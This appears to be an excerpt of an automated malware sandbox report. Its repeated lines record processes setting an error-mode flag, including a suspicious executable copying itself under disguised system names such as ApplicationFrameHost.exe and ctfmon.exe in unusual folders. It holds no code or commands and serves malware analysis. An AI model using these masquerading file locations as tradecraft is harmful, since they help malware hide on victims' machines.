Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
